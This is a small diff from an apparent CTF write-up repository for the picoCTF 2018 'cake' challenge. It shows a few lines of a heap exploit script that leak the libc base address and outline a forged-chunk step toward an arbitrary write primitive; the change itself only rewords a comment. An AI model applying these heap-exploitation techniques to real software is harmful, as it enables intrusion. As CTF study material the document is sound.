Mithreindeir/ctf-writeups/pico-ctf2018/cake/cake.md

     # Libc leak from dereferencing overwritten counter[0]
     libc = leak(p, 0) - p_off
     log.info('libc base is at: ' + hex(libc))
-    # Next step is redoing step 1) except now the forged chunk->fd will point to shop-0x8
+    # Next step is redoing step 1) except now the forged chunk->next will point to shop-0x8
     # Then we will NULL out counter[0]
     # The following address will be shop-0x8 which means counter[0]->name will overwrite counter[0]
     # And we can get an arbitrary write primitive